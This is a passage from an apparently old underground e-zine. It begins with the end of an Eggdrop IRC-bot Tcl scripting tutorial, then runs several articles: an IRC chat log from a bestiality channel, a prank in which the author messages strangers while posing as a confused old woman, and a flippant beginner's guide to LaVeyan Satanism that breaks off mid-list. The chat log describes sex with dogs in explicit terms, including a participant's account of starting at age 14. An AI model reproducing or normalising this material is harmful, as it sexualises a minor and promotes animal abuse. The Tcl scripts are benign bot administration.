           containing character index of string.  A word is considered to be 
      any
           contiguous range of alphanumeric or underscore characters, or any 
      single
           character other than these.
      
       string wordstart string index
           Returns the index of the first character in the word containing 
      character
           index of string.  A word is considered to be any contiguous range 
      of
           alphanumeric or underscore characters, or any single character 
      other than
           these.
      
       
       ## V - Loops ##
      
       This section follows the following loops: foreach, for, and while 
      (thanxs for the help from the people on
       the Doc Project List).
      
       Foreach a list of items, and goes through each setting it as a var 
      then executing commands, and goes to
       the next.
      
       This proc will deop any one on the chan who doesn't have +o.
      
       syntax for foreach:
      
          foreach nick [chanlist $chan] {
            if {([isop $nick $chan]) && (![matchattr $nick o]) && \
                (![matchchanattr $nick o $chan])} {
              pushmode $chan -o $nick
            }
          }
      
      
       chanlist gives a list of people on the chan.
      
       # The Procedure #
           It first checks to make sure he's an op
           Then checks to see if he's a global op
           Then checks to see if he's a chan op
           If all work out, he is deoped, if not nothing happens
      
       syntax for while:
      
          while {![botisop $chan]} {
            puthelp "PRIVMSG $chan :Opme!!!"
          }
      
      
       That will flood the bot off but you get the idea?
      
       It will execute body until the operator changes value
      
       syntax for for:
      
          for {set x 0} {$x > 5} {incr x} {
            puthelp "PRIVMSG $chan $x"
          }
      
      
       First of all this script will count from 1 to 6
      
       The first set of {}'s happens only when U execute the for statement 
      the second {}'s is the stopper.  When
       that is true it will stop the body the third {} is every time you 
      complete body, do it, then do body again
      
      
       ## VI - User-get/User-set ##
      
       Each user on eggdrop has a special field called "xtra" which lets you 
      store whatever you like about users. 
       The field size is limited so don't get too excited.  :)
      
       It is a line where you (and your scripts) can store things the way 
      you want to, just like the "comment" line
       each user has.  But to improve it's functionality, there are two 
      procedures which come with the
       "toolkit.tcl" (comes in eggdrops scripts dir) to access this field in 
      a more organized way.
      
       The best thing is to *only* access the xtra field using these two 
      procedures. Make sure no other script is
       accessing it another way (simple way to check this is to 'grep 
      setxtra *' and 'grep getxtra *' in your scripts
       directory).
      
       The procs to use:
      
          user-set handle fieldname 'value...'
          user-get handle fieldname
      
      
       You can have any fieldname you like, like 'url' to store the users 
      homepage, 'birthday', etc (check out 'set whois-fields' in eggdrops 
      config file, which makes use of exactly these fields!).
      
       You name the field, set the value with user-set and don't have to 
      worry anymore.  And retore the value with user-get afterwards, as in:
      
          if {[user-get Ernst url] == ""} {putlog "Ernst has no url set"}
      
      
      
       
       ## VII - Return command ##
      
       The return command has two uses.  The first is to stop the current 
      proc.  The second, and most usefull is the the abiity to return a 
      number, or text.
      
       Heres an example:
      
          if {[chkaccess $nick]} {
            pushmode $nick +o $chan
          }
      
      
       chkaccess would return a 0, or 1 and then it would op them based on 
      the return.
      
       This is from tcl-commands.doc:
      
           Several bindings pay attention to the value you return from the 
      proc
           (using "return $value").  Usually they expect a 0 or 1, and 
      failing
           to return any value is interpreted as a 0.
      
           Here's a list of the bindings that use the return value from 
      procs
           they trigger:
      
           MSG   Return 1 to make the command get logged like so:
                 (nick!user@host) !handle! command
      
           DCC   Return 1 to make the command get logged like so:
                 #handle# command
      
           FIL   Return 1 to make the command get logged like so:
                 #handle# files: command
      
           PUB   Return 1 to make the command get logged like so:
                 <<nick>> !handle! command
      
           CTCP  Return 1 to ask the bot not to process the CTCP command on 
      its
                 own.  Otherwise it would send its own response to the CTCP
                 (possibly an error message if it doesn't know how to deal 
      with
                 it).
      
           FILT  Return 1 to indicate the text has been processed, and the 
      bot
                 should just ignore it.  Otherwise it will treat the text 
      like
                 any other.
      
           FLUD  Return 1 to ask the bot not to take action on the flood.
                 Otherwise it will do its normal punishment.
      
           RAW   Return 1 to ask the bot not to process the server text.  
      This
                 can affect the bot's performance (by causing it to miss 
      things
                 that it would normally act on) -- you have been warned.
      
           WALL  Return 1 to make the command get logged liked so:
                 !nick! msg
      
       syntax for return:
           return <numeric>
      
       Example:
           return 0
      
         
       ## VIII - Good Programming habits ##
      
       Many people load tons of scripts at once, and they don't want 
      conflicts! There are a few ways to help
       avoid conflicts.  USE RETURN 0 AS LITTLE AS POSSIBLE or else it will 
      stop all bind searching after
       your proc..  Here are some other ideas
      
       (1) Label your procs sensable.  Such as in my scripts I some times 
      use
               proc mbti:antiidle {} {}
           Not some thing like
               proc script {} {}
      
       (2) Same with your variables.  If you use '-'s in your variables when 
      calling
           them you must ${mbti-antiidle} some thing like that
      
       (3) If your script uses timers make it compatable so you don't don't 
      have too
           many of them (see examples in IX)
      
       If you've noticed in all my procecdures I've used an indentation 
      system, I suggest you also use one. Most
       common methods consist of either a TAB or Double Spacing.
      
       <N> where N is the number of spaces
      
       Example
      
           proc bla {} {
           <1> globlal testchan
           <1> if {[botisop $testchan]} {
           <1> <2> puthelp "PRIVMSG $testchan :I'm oped!
           <1> }
           }
      
      
       ## IX - Program Examples, then explained. ##
      
       I've taken some of these from programs I've written, or I just made 
      them up =) (Many thanxs to the
       people on the Doc Project Listserv for suggestions!)
      
       ###
      
          bind pubm O !rules pubm:ab_rules
          proc pubm:ab_rules {nick host hand chan text} {
            set who [lindex $text 0]
            if {$who == ""} {
          # Because of line wraping it will not fit on one line, but you get 
      the idea
              putmsg $chan "There is  NO  Cursing, Harrasment, Abusing the 
      bot,
          Flooding, Clones, Advertising.  Violation of this policy may 
      result in a
          kick, and/or ban."
              return 1
            }
            putmsg $who "There is  NO  Cursing, Harrasment, Abusing the bot,
          Flooding, Clones, Advertising.  Violation of this policy may 
      result in a
          kick, and/or ban."
          }
      
      
       # The Bind #
           Public Match
           Op Access on that Channel, or Global Op Access
           Trigger: !rules
           Proc Name: pubm:ab_rules
      
       # The Procedure #
           If the first parameter in $text is valid it will be set to who; 
      if it doesn't exists
           whom will be "".  Now it says, if who has no value msg the 
      channel the rules
           of the channel But if there is a a nick put a msg to $nick
      
       ####
      
      
       ###
      
          # Script name   : antiidle10-mbti.tcl
          # Script Version: 1.0
          # Script Author : The |mmortaL [asn@cdc.net] (PGP Public key 
      Avaible, put
          #                 "send key" in the subject.)
          # Script Desc.  : An Anti Idle script for 1.1.x (Probably work 
      with 1.0
          #                 though)
      
          # Please edit the following variables: (Channel to which a msg is 
      to be
          # sent, How often that message should be sent, and what to send; 
      in that
          # order)
          set antiidlechan #lamechan
          set antiidletime 5
          set antiidlemsg "antiidle10-mbti.tcl - Made By The |mmortaL"
      
          ## Do not change any thing under this point! ##
          ## Do not change any thing under this point! ##
          ## Do not change any thing under this point! ##
      
          # This makes all the data in $antiidlechan lower case
          set antiidlechan [string tolower $antiidlechan]
      
          # This makes sure that your on the channel which you specified. 
      String
          # match is case sensitive that is why I made everything lower case
          # putlog is a command that puts some thing in the main logs of the 
      bot,
          # and when the bot rehashs, or loads up you see that message.
          # return 1 stops the script from loading, in the event that it 
      isn't on
          # that channel.
          if {![string match *$antiidlechan* [string tolower [channels]]]} {
            putlog "ERROR ERROR I am not on $antiidlechan!!!!"
            return 1
          }
      
          # VERY VERY VERY VERY VERY VERY VERY IMPORTANT!!
          # If your script is gonna cause major problems if a person 
      .rehashs, like
          # if you set a timer use some thing to this equivelent:
      
          # Make a variable, like antiidleloaded, by default that variable 
      doesn't
          # exist.  Put an if statement of info exists (checks to see if a 
      variable
          # is there).  And if it isn't set to 1, set it to 1, and load the 
      timer,
          # if the variable is there, and set to 1, then do nothing.
          if {![info exists antiidleloaded]} {
            timer $antiidletime proc:antiidle
            set antiidleloaded 1
          }
      
          proc proc:antiidle {} {
            global antiidlechan antiidletime antiidlemsg
            puthelp "PRIVMSG $antiidlechan :$antiidlemsg"
            timer $antiidletime proc:antiidle
          }
      
      
      
       # This is fairly simple, put a global statement for each of the 
      global variables, because
       # you need to access them.  Send the msg to the channel, and then re-
      set the timer.
      
       # The Bind #
           This script does not function with a bind.
           Trigger: "if {!info exists antiidleloaded}" checks to see if 
      script is running
           Proc Name: proc:antiidle
      
       # The Procedure #
      If info does not exist for $antiidleloaded, timer for 
      proc:antiidle begins, if it
           does exists, proc:antiidle continues running.
           When timer fires, put $antiidlemsg to $antiidlechan and start 
      another timer
      
       ###
      
      
       ###
      
          set flag1 i
          set chanflag1 i
          set flag2 v
          set chanflag2 v
      
          bind join i * join:mbti_autoop
          bind join v * join:mbti_autovoice
          bind join - * join:mbti_cautoop
          bind join - * join:mbti_cautovoice
      
          proc join:mbti_autoop {nick host hand chan} {
            pushmode $chan +o $nick
          }
      
          proc join:mbti_autovoice {nick host hand chan} {
            pushmode $chan +v $nick
          }
      
          proc join:mbti_cautoop {nick host hand chan} {
            if {[matchchanattr $hand i $chan]} {pushmode $nick +o $chan}
          }
      
          proc join:mbti_cautovoice {nick host hand chan} {
            if {[matchchanattr $hand v $chan]} {pushmode $nick +v $chan}
          }
      
      
      
       This is a fairly easy script, the only new thing is the newflags. 
      Eggdrop lets you add as many new flags as there aren't used.
       Set newflag[num] z
       where [num] is a number that doesn't exists...
      
       set newchanflag[num]
       Ditto :P
      
       # The Bind #
           Join on channel
           AutoOp and AutoVoice Access on that Channel
           Trigger: users with +i or +v joining the channel
           Proc Name: join:mbti_autoop
                               join:mbti_autovoice
                               join:mbti_cautoop
                               join:mbti_cautovoice
      
       # The Procedure #
           When join bind is triggered by specified users, pushmode $nick 
      flag $chan
           or matchchanattr $hand flag $chan is true pushmode $nick flag 
      $chan
      
       ###
      
      
       ###
      
          bind mode - "*+o $botnick*" mode:automode
          proc mode:automode {nick host hand chan modechg} {
            foreach nick [chanlist $chan] {
              set hnick [nick2hand $nick]
              if {![isop $nick $chan]} {
                if {([matchattr $hnick o]) || ([matchchanattr $hnick o 
      $chan])} {
                  pushmode $chan +o $nick
                }
                if {([isop $nick $chan]) && ([matchchanattr $hnick d 
      $chan])} {
                  pushmode $chan -o $nick
                }
              }
            }
          }
      
      
      
      foreach nick [chanlist $chan] basicly says to do this for every one in 
      the chan. One check to see if he has ops, if he dosn't and he has OP 
      access then op him!!
      Then If he has ops, and he's supposed to be deoped them deop him!
       ###
      
      
      # end !@#$
      
      
      
      
      
      0000000000000000000000000000000000000000000000000000000000000000000000
      000  0000000000   0000000000000000000000000000000000000   000000000000
      000  00000000      00000000000000   00000  000 000000       0000   000
      000  00000000   0   0000000000000   00000  00  00000  00000  000   000
      000  0000000   000   000000000000   0000   00  0000 00000000 000   000
      000  0    00   000   000       00   00           0 000   0 00 00   000
      000        0   000   00        00   00           0 000 00  00 00   000
      000   00   0   000   00   00   00   0000  00  0000 00  000 00 00   000
      000  0000  0   000   0   0000  00   0000  00  0000 00  000 00 00   000
      000  0000  0   000   0   0000  00   0000 000  0000 00  000 00 00   000
      000  0000  0   000   0   0000  00   0           00 00  000 00 00   000
      000  0000  0   000   0   0000  000000           00 00  000 00 00000000
      000  000   0   000   00   00   00000000  00  00000 00  00  00 00000000
      000   0    0    0    0         00   000 000  00000 000        00   000
      000        00       000        00   000 000 0000000 000000000000   000
      000000000000000   00000000000  00000000000000000000  00000000000000000
      00000000000000000000000 0000   000000000000000000000       00000000000
      00000000000000000000000        00000000000000000000000    000000000000
      00000000000000000000000       0000000000000000000000000000000000000000
      0000000000000000000000000000000000000000000000000000000000000000000000
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 6 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::: Obscene log  #gaydogsex  irc.undernet.org :::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      <loner> true, so tell me what is sex with a dog like?
      <PantheraD> umm.. good.. :)
      <loner> don't they get bit roough?
      <PantheraD> if you're lucky :)
      <Roxie_Dog> thay can do, if you're lucky :)
      <loner> do they bite?
      <PantheraD> yes, again. if you're lucky..
      * PantheraD likes it rought.
      <PantheraD> err.. rough
      <loner> sound painful not pleasurable
      <PantheraD> all depens on what you like.. some dogs are rough.. some 
      aren't
      <loner> don't know what i would like. never tried it with a dog
      <PantheraD> have you had sex with a man?
      <loner> couple of times
      <PantheraD> was he rough with you?
      <loner> nah, pretty gentle actually
      <PantheraD> well, did you want him to be rough?
      *** Roxie_Dog has quit IRC (Read error to Roxie_Dog[modem-
      214.iron.dialup.pol.co.uk]: Connection reset by peer)
      <loner> not really
      <PantheraD> you woudn't want a rough dog then.
      *** Roxie_Dog has joined #gaydogsex
      *** Knot sets mode: +v Roxie_Dog
      <PantheraD> wb roxie :)
      <loner> does this mean that i should stay away from dogs 
      <PantheraD> no
      <loner> cool, still want to try
      <PantheraD> just be aware that dogs won't alter the way the fuck 
      because it's to rough for you..
      <ect> panthera.. how many diff breeds and dogs have you had sex with?
      <loner> i guess i could deal with that
      <PantheraD> well, i used to work at a kennel so a lot :)
      <ect> heh. really?
      * PantheraD nods
      <PantheraD> for 3 years
      <loner> variety is the spice of life, eh?
      <ect> and?!?
      <PantheraD> so true.. :)   
      <PantheraD> and what?
      <ect> heh.. n/m what got you turned unto dogs?
      <PantheraD> but i always had my favorite. :)
      <PantheraD> saw my male lab breeding a female and i wondered what it 
      would be like to be with him
      *** nik7 has joined #gaydogsex
      <loner> how was it
      <PantheraD> hello nik, whass up>?
      <ect> and did you you?
      <PantheraD> yes.. that i did :)
      <ect> how did you get him to do that with you?
      <PantheraD> jacked him a little until he started to hump, then showed 
      him my butt. 
      <ect> ahh. and did you enjoy?
      <PantheraD> the first time, no.
      <loner> why not
      <PantheraD> i was quite young and he was very well hung...  ie, small 
      butt, big cock
      <loner> makes sense, how old were you
      <PantheraD> 14
      <loner> and how old was he
      <PantheraD> 5
      <loner> no longer a pup
      <ect> did you ever do anything with him again?
      <PantheraD> nope..    oh yes.. he was my lover for 4 years every night 
      after..
      <PantheraD> err.. no, he was not a pup...  sorry.. that was a bit 
      confusing..
      <loner> how did you get past the size difference
      <PantheraD> he was very used to breeding...    
      <ect> ever tried any other animal than dogs?
      <PantheraD> well, heh.. he just rammed it in and stretched me out...
      <loner> it must have hurt
      <PantheraD> no.. just men and dogs.. i want to try a stallion at some 
      point
      <PantheraD> yes, yes it did
      <loner> did he ever get his knot in you
      <ect> wow. a stallion huh? woo. big.
      <PantheraD> yeah, he did it the first time and just about every time 
      there after..  (i prefer to tie)
      <PantheraD> yeah!   nice big cock and a nice big load of cum :)
      <loner> i hear knots get huge
      <PantheraD> biggest i've seen was the size of a softball
      <PantheraD> (247 lb st. bernard)
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 7 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::::::: grannanizing  Prae  prae@talk21.com ::::::::::::: ] 
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      Here it is! What you've all been waiting for.. It's a revolution in 
      home entertainment! No it's not a hands-free vibrator or even an 
      inflatable doll that gives head without chaffing your penis! It's my 
      latest party trick, its called 'Grannanizing'.. 
      And since I'm such a nice person I am going to show you how I do it. 
      :)
      
      Here is what I do.. I /msg someone and I act like an old lady who is a 
      bit nutty..
      
      
      
      <Prae> oh hello dear
      <thep0et> hi
      <Prae> i was wondering if you could help me?
      <thep0et> depends
      <Prae> its disgusting!
      <thep0et> huh
      <Prae> am i speaking to the right person?
      <thep0et> i don't know are you?
      <Prae> why?
      <Prae> that jigsaw is driving me nuts!
      <thep0et> umm ok..
      <thep0et> wtf are you talkin about
      <Prae> are you still there?
      <thep0et> possibly
      <Prae> i was wondering if you could help me?
      <thep0et> yes you asked that once
      <Prae> woo its sexy
      <thep0et> dude you smoked some bad crack or somethin
      <Prae> oh how dare you?!
      <thep0et> how dare i what
      <thep0et> what are you gonna do?
      <Prae> i cant believe you're asking me that
      <thep0et> ok.....
      <Prae> are you still there?
      <thep0et> man your fuckin loony
      <Prae> hello betty
      <thep0et> seek help please
      <thep0et> betty?
      <Prae> yes
      <thep0et> umm my name is not betty
      <Prae> in my day it never cost that much
      <thep0et> yeah. dildos are much cheaper now
      <Prae> its disgusting!
      <thep0et> your the one who brought it up
      <Prae> why?
      <thep0et> i don't know.. you tell me
      <Prae> am i speaking to the right person?
      <thep0et> do you purposly repeat your self or are you really stupid?
      <Prae> oh how dare you!
      <Prae> can you put me through to the person in charge?
      <Prae> are you still there?
      <Prae> goodbye dear.
      
      
      <Prae> oh hello dear
      <Mr_C> hello, who are u
      <Prae> its fanny speaking
      <Prae> i was wondering if you could help me?
      <Mr_C> oki. 
      <Prae> am i speaking to the right person?
      <Mr_C> i dont know
      <Prae> i was wondering if you could help me?
      <Mr_C> oki, with wht
      <Mr_C> what
      <Prae> its disgusting!
      <Mr_C> tell me
      <Prae> in my day it never cost that much
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <madwill> hi
      <madwill> >=]
      <Prae> i was wondering if you could help me?
      <madwill> with?
      <Prae> its disgusting!
      <madwill> what is?
      <Prae> in my day it never cost that much!
      <Prae> are you still there?
      <madwill> yeah
      <Prae> am i speaking to the right person?
      <madwill> what are you talking about?
      <madwill> no
      <madwill> i dont think so
      <Prae> why?
      <madwill> prae - what the hell are you smoking?
      <Prae> yes, its fanny speaking
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <twist182> hi
      <Prae> i was wondering if you could help me?
      <twist182> ok
      <twist182> why didnt your ip resolve
      <Prae> its disgusting!
      <twist182> :(
      <Prae> in my day it never cost that much
      <twist182> huh
      <Prae> am i speaking to the right person?
      <twist182> ?
      <twist182> are you drunk?
      <Prae> that jigsaw is driving me nuts
      <twist182> what the fuck are youtalking about?
      <Prae> are you still there?
      <twist182> yes
      <Prae> i was wondering if you could help me?
      <twist182> WITH WHAT
      <Prae> that jigsaw is driving me nuts
      <Prae> hello betty
      <twist182> WHAT FUCKING JIGSAW
      <Prae> i cant believe you're asking me that
      <Prae> oh how dare you!?
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <alcyone> Hi .
      <Prae> i was wondering if you could help me?
      <alcyone> Hm ?
      <Prae> its disgusting!
      <alcyone> What ?!
      <Prae> in my day it never cost that much
      <alcyone> -laugh
      <alcyone> Do you need a loan ?
      <Prae> am i speaking to the right person?
      <alcyone> Who knows .
      <Prae> that jigsaw is driving me nuts
      <alcyone> I bet .
      <alcyone> You should cut back on the alcohol .
      <Prae> its disgusting!
      <alcyone> I bet .
      <Prae> oh how dare you?
      <alcyone> Easily . . .
      <Prae> are you still there?
      <alcyone> For now .
      <Prae> i was wondering if you could help me?
      <alcyone> Mayhaps .
      <Prae> woo its sexy
      <alcyone> Is it ?
      <Prae> i cant believe you're asking me that
      <alcyone> Well , I did .
      <Prae> oh how dare you1?
      <Prae> hello betty
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <Kitty_Cat> lol.. hi prae
      <Prae> i was wondering if you could help me?
      <Kitty_Cat> with?
      <Prae> its disgusting!
      <Kitty_Cat> ?
      <Prae> am i speaking to the right person?
      <Kitty_Cat> i dont know.
      <Prae> that jigsaw is driving me nuts
      <Kitty_Cat> whom do you think you are addressing
      <Kitty_Cat> ?
      <Prae> yes, its fanny speaking
      <Kitty_Cat> huh?
      <Prae> am i speaking to the right person?
      <Kitty_Cat> i dont know.. are you on my left?
      <Prae> its disgusting!
      <Prae> in my day it never cost that much
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <Nala-Bebe> hi :(
      <Prae> i was wondering if you could help me?
      <Nala-Bebe> with?
      <Prae> its disgusting!
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      
      
      <Prae> oh hello dear
      <Prae> i was wondering if you could help me?
      <Prae> are you still there?
      <Thuull> I'm here
      <Prae> i was wondering if you could help me?
      <Thuull> depends, what do you need?
      <Prae> its disgusting!
      <Prae> are you still there?
      <Thuull> yes, I am...what do you need help with?
      <Prae> that jigsaw is driving me nuts
      <Prae> are you still there dear?
      <Prae> in my day it never cost that much
      <Prae> woo its sexy
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <frame> hi
      <Prae> i was wondering if you could help me?
      <frame> with?
      <frame> do I know you?
      <Prae> its disgusting!
      <frame> ?
      <Prae> in my day it never cost that much
      <frame> ?
      <Prae> are you still there?
      <frame> yes
      <Prae> i was wondering if you could help me?
      <frame> with?
      <Prae> i cant believe you're asking me that
      <Prae> am i speaking to the right person?
      <frame> stop begging for help and tell me wtf you want help with
      <Prae> oh how dare you!?
      <frame> I don't know
      <Prae> why?
      <frame> who do you think you are speaking to?
      <Prae> woo its sexy
      <Prae> yes, its fanny speaking
      <frame> fanny?
      <Prae> yes
      <Prae> am i speaking to the right person?
      <frame> your hostmask seems familiar
      <frame> but I don't know anyone by the name of fanny
      <Prae> ok luvvy
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      
      
      <Prae> oh hello dear
      <Prae> i was wondering if you could help me?
      <RLoxley> with?
      <Prae> its disgusting!
      <Prae> are you still there?
      <RLoxley> yes
      <Prae> i was wondering if you could help me?
      <RLoxley> i was waiting for you
      <RLoxley> with what?
      <Prae> i cant believe you're asking me that
      <RLoxley> enough games, whats on your mind
      <Prae> its disgusting
      <RLoxley> either spit it out, or i have other business
      <Prae> am i speaking to the right person?
      <RLoxley> the right person for what
      <RLoxley> you know exactly who i am
      <RLoxley> and i know exactly who you are
      <RLoxley> come to the point
      <Prae> can you put me through to the person in charge?
      <RLoxley> i am the person in charge
      <Prae> in my day it never cost that much
      <RLoxley> you are obviously insane, let me know when you return to 
      earth
      <Prae> oh how dare you!?
      <Prae> are you still there?
      <RLoxley> yes, and very busy
      <Prae> that jigsaw is driving menuts!
      <RLoxley> yes, i can see you are quite nuts
      <Prae> are you still there?
      <Prae> OH HOW DARE YOU!?
      <Prae> hello betty
      <Prae> i was wondering if you could help me?
      <RLoxley> go and take your meds
      <Prae> woo its sexy
      <Prae> are you still there?
      <RLoxley> no
      <Prae> why?
      <Prae> yes, its fanny speaking
      <Prae> are you still there dear?
      <Prae> goodbye dear
      
      
      <h2so4-> ok here.
      <h2so4-> =]
      <Prae> oh hello dear
      <Prae> i was wondering if you could help me?
      <h2so4-> hah
      <h2so4-> yes
      <h2so4-> yes
      <Prae> its disgusting!
      <h2so4-> it is?!
      <Prae> yes
      <Prae> that jigsaw is driving me nuts!
      <h2so4-> haha
      <h2so4-> what jigsaw
      <Prae> are you still there?
      <h2so4-> and whats disgusting?!
      <h2so4-> yes.
      <h2so4-> are you stoned per chance?
      <Prae> i cant believe you're asking me that
      <h2so4-> :/
      <Prae> am i speaking to the right person?
      <h2so4-> probably not...
      <h2so4-> i think you want a shrink..
      <Prae> oh how dare you!?
      <h2so4-> well i don't know?
      <Prae> woo its sexy
      <h2so4-> yes
      <h2so4-> i have jammy dodgers...
      <Prae> why?
      <h2so4-> i dont know
      <h2so4-> i dont really like them
      <h2so4-> i just eat cos im bored
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      
      <Prae> oh helo dear
      <Mister]X[> hi
      <Mister]X[> do i know u
      <Prae> i was wondering if you could help me?
      <Mister]X[> with what?
      <Prae> its disgusting!
      <Mister]X[> with what?
      <Prae> in my day it never cost that much
      <Mister]X[> really
      <Prae> yes
      <Prae> am i speaking to the right person?
      <Mister]X[> yeah
      <Mister]X[> what never cost that much
      <Prae> thats not important
      <Prae> i was wondering if you could help me?
      <Mister]X[> yeah sure
      <Prae> its disgusting!
      <Prae> are you still there?
      <Mister]X[> yes
      <Mister]X[> i am what
      <Mister]X[>  do u fucking want me to do
      <Mister]X[> just tell me
      <Prae> could you put me through to the person in charge?
      <Mister]X[> 10 seconds
      <Prae> oh how dare you!?
      <Mister]X[> no sorry
      <Prae> why?
      <Mister]X[> fuck off
      <Prae> woo its sexy
      <Prae> are you still there?
      <Mister]X[> fuckign hell its sexy
      <Mister]X[> i know
      <Mister]X[> u r telling me
      <Mister]X[> omg its so sexy
      <Prae> yes
      <Prae> its disgusting!
      <Mister]X[> i know its so fucking disgusting
      <Mister]X[> its just digusting
      <Mister]X[> so groose
      <Mister]X[> and disgraceful
      <Prae> that jigsaw is driving men uts
      <Mister]X[> ohh its o giisgusting
      <Mister]X[> its unreal
      <Prae> could you put me through to the person in charge?
      <Mister]X[> yeah,  eyghhh
      <Mister]X[> why do u wanna speak to the person in charge
      <Mister]X[> u realise u will have to take the test
      <Prae> thats not important
      <Prae> why?
      <Mister]X[> if u want to speak with the person in charge
      <Mister]X[> thats the protocol
      <Prae> hello betty
      <Mister]X[> i am affraid
      <Prae> why?
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <Accipiter> Um
      <Accipiter> Hi.
      <Prae> i was wondering if you could help me?
      <Accipiter> Do I know you?
      <Prae> i cant believe you're asking me that
      <Accipiter> Ok...
      <Accipiter> am I supposed to know you?
      <Prae> thats not important
      <Prae> i was wondering if you could help me?
      <Accipiter> With what?
      <Prae> its disgusting!
      <Accipiter> Just ask the question.
      <Prae> ok luv
      <Prae> are you still there?
      <Accipiter> YES.
      <Prae> wo its sexy
      [Accipiter PING]
      <Prae> are you still there?
      <Accipiter> YES. 
      <Accipiter> Ask the question already.
      <Prae> oh how dare you!?
      <Accipiter> what who
      <Prae> am i speaking to the right person?
      <Accipiter> Apparently.
      <Accipiter> Ask me what it is you want to ask.
      <Prae> can you put me through to the person in charge?
      <Accipiter> yes
      <Accipiter> i'm still here.
      <Accipiter> I am in charge.
      <Prae> its disgusting!
      <Accipiter> That's fine.,
      <Accipiter> ask.
      <Prae> that jigsaw is driving me nuts
      <Accipiter> A jigsaw puzzle is disgusting?
      <Accipiter> you have issues.
      <Prae> woo its sexy
      <Prae> are you still there?
      <Accipiter> No. I'm lying.
      <Prae> its disgusting!
      <Accipiter> I'm sure it is.
      <Prae> hello betty
      <Accipiter> hello dolly
      <Accipiter> ?
      <Prae> oh how dare you!?
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 8 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::: Satanism   Vegtam  - vegtam@fjell.online.no ::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
       Do you want to be a satanist? Or do you want to know what a satanist 
      is? Well, the answers will be found her . This is a course for 
      beginners. The more skilled one can fuck off and read something else. 
      I will only tell how to be a Satanist as a follower of Anton Szandor 
      LaVey, and not as a devil-worshipping jerk that sacrifices young 
      virgins. I will only do it briefly, tell you the basics, so if you 
      want to know more, go to http://www.churchofsatan.com. 
      
      I will now try to combine clothing style, music and the rules of being 
      a satanist.
      
      Ok, first of all, to be a Satanist, you should dress like one. Have 
      style. The basic color is of course BLACK (and due to that fact, it`s 
      even better if you are black skinned). You can use other colors like 
      red and purple, but it must match, so you have the gloomy look. Your 
      hair should be long, and colored black. You also can be shaved. Spikes 
      and leather jackets gives you a raw and primitive look. But you can 
      try to look a little mystical. Wear a black coat or something. Black 
      latex will never run out of date when you are a satanist. And always 
      use army boots, or something look-a-like.
      
      If you are white, make sure your face is as pale as it can be. Never 
      take sun. That ruins your evil look. 
      Some people thinks it`s funny to use corpse painting...but if your 
      walking in mall or something with corpse painting, your stupid...and 
      remeber, it`s no sin to be original...
      
      You should also listen to so called dark, moody n Satanic music that 
      get u in a dark and gloomy mood, and I don`t mean a stupid a g1mp like 
      Marilyn Manson (many will maybe disagree, but he`s nothing but a jerk 
      off to me. A false rip off). Listen to classical music. Listen to 
      brutal music from the north, black metal. The most famous ones that is 
      worth a mention is Mayhem, Darkthrone, Immortal, Emperor, Enslaved, 
      Vintersorg, Satyricon, early Ulver, Finntroll....blablabla...well, at 
      least you have something to start with?
      
      Well, if you got the clothing style and maybe even started to like the 
      so called "satanic" music, we are now ready for the the lesson on how 
      to behave and act. I will now take up "The Nine Satanic Statements", 
      "The Elven Satanic Rules of the Earth" and "The Nine Satanic Sins". 
      When you have read these, and if you still are interested in being a 
      Satanist, buy the Satanic Bible and visit 
      http://www.churchofsatan.com, as mentioned somewhere above.
      Okay, here we go:
      
      The Nine Satanic Statements
      from The Satanic Bible by LaVey
      
      
      1. Satan represents indulgence instead of abstinence!
      
      2. Satan represents vital exitstence instead of spritual pipe dreams!
      
      3. Satan represents undefiled wisdom instead of hypocritical self-
      deceit!
      
      4. Satan represents kindness to those who deserve it instead of love 
      wasted on ingrates!
      
      5. Satan represents vengeance instead of turning the other cheek!
      
      6. Satan represents responsibility tho the responsible instead of 
      concern for psychic vampires!
      
      7. Satan represents man as just another animal, sometimes better, more 
      often worse than those that walk on all fours, who, because of his 
      "divine spiritual and intellectual development," has become the most 
      vicious animal of all!
      
      8. Satan represents all of the so-called sins, as they all lead to 
      physical, mental, or emotional gratification!
      
      9. Satan has been the best friend the Church has ever had, as He has 
      kept it in business all these years!
      
      The Eleven Satanic Rules of the Earth
      by LaVey
      
      1. Do not give opinions or advice unless you are asked.
      
      2. Do not tell your troubles to others unless you are sure they want 
      to hear them.
      
      3. When in another`s lair, show him respect or else do not go there.
      
      4. If a guest in your lair annoys you, treat him cruelly and without 
      mercy.
      
      5. Do not make sexual advances unless you are given the mating signal.
      
      6. Do not take that which does not belong to you unless it is a burden 
      to the other person and he cries out to be relieved.
      
      7. Acknowledge the power of magic if you have employed it successfully 
      to obtain your desires. If you deny the power of magic after having 
      called upon it with success, you will lose all you have obtained.
      
      8. Do not complain about anything to which you need not subject 
      yourself.
      
      9. Do not harm little children.
      
      10. Do not kill non-human animals unless you you are attacked or for 
      your food.
      
      11. When walking in open territory, bother no one. If someone bothers 
      you, ask him to stop. If he does not stop, destroy him.
      
      
      The Nine Satanic Sins
      by LaVey
      
      1. Stupidity - The top of the list for Satanic sins. The Cardinal Sin 
